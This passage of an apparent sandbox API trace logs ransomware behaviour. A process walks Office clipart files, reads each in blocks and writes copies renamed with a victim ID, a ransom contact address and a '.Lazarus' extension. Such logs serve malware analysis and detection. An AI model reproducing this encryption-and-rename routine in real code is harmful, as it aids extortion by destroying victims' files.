office\\root\\clipart\\pub60cor\\j0107452.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0133.709] GetFileType (hFile=0x2ac) returned 0x1 [0133.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0133.709] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0133.710] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0133.710] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0133.710] CloseHandle (hObject=0x2ac) returned 1 [0133.710] AreFileApisANSI () returned 1 [0133.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0133.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0133.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 69 [0133.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0133.710] GetFileType (hFile=0x2ac) returned 0x1 [0133.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0133.710] CloseHandle (hObject=0x2ac) returned 1 [0133.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0133.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0133.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0133.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0133.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0133.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0133.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0133.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0133.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0133.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0133.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0133.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0133.712] AreFileApisANSI () returned 1 [0133.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0133.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0133.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 69 [0133.712] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6e9e74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x52e0)) returned 1 [0133.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0133.712] AreFileApisANSI () returned 1 [0133.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0133.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0133.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0133.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0133.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0133.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0133.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0133.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0133.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0133.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0133.712] GetLastError () returned 0x0 [0133.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x40f98 [0133.713] AreFileApisANSI () returned 1 [0133.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x932c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 131 [0133.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x106) returned 0x8bd10 [0133.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x932c8, cbMultiByte=-1, lpWideCharStr=0x8bd10, cchWideChar=131 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 131 [0133.713] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0133.713] GetFileType (hFile=0x2ac) returned 0x1 [0133.713] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0133.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x40f68 [0133.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x40fe8 [0133.714] AreFileApisANSI () returned 1 [0133.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0133.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a790 [0133.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a790, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF") returned 69 [0133.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0133.714] GetFileType (hFile=0x288) returned 0x1 [0133.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0133.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0133.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0133.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0133.714] GetLastError () returned 0x0 [0133.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x9db40 [0133.714] ReadFile (in: hFile=0x288, lpBuffer=0x9db40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x9db40*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0133.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0133.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0133.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0xa7b90 [0133.716] GetLastError () returned 0x0 [0133.716] GetLastError () returned 0x0 [0133.716] GetLastError () returned 0x0 [0133.716] GetLastError () returned 0x0 [0133.716] ReadFile (in: hFile=0x288, lpBuffer=0x9db40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x9db40*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0133.718] WriteFile (in: hFile=0x2ac, lpBuffer=0xa7b90*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0xa7b90*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0133.719] GetLastError () returned 0x0 [0135.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0135.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0135.517] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7cecf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8379, dwReserved0=0x1, dwReserved1=0x0, cFileName="J0145168.JPG", cAlternateFileName="")) returned 1 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0135.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0135.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0135.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0135.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x40f98 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0135.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40f98 | out: hHeap=0x20000) returned 1 [0135.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x40fd8 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0135.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x40fd8 | out: hHeap=0x20000) returned 1 [0135.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0135.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0135.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0135.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0135.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0135.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0135.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0135.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0135.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0135.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0135.518] AreFileApisANSI () returned 1 [0135.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG", lpUsedDefaultChar=0x0) returned 69 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0135.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0135.518] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0135.518] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x41048 [0135.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x40ef8 [0135.519] AreFileApisANSI () returned 1 [0135.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0135.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0135.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG") returned 69 [0135.519] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145168.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0135.520] GetFileType (hFile=0x2ac) returned 0x1 [0135.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0135.520] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0135.520] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0135.520] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0135.520] CloseHandle (hObject=0x2ac) returned 1 [0135.521] AreFileApisANSI () returned 1 [0135.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0135.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0135.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG") returned 69 [0135.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145168.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0135.521] GetFileType (hFile=0x2ac) returned 0x1 [0135.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0135.521] CloseHandle (hObject=0x2ac) returned 1 [0135.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0135.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0135.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0135.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0135.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0135.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0135.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0135.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0135.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0135.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0135.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0135.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0135.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0135.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0135.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0135.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0135.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0135.522] AreFileApisANSI () returned 1 [0135.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0135.522] RtlAllocateHeap 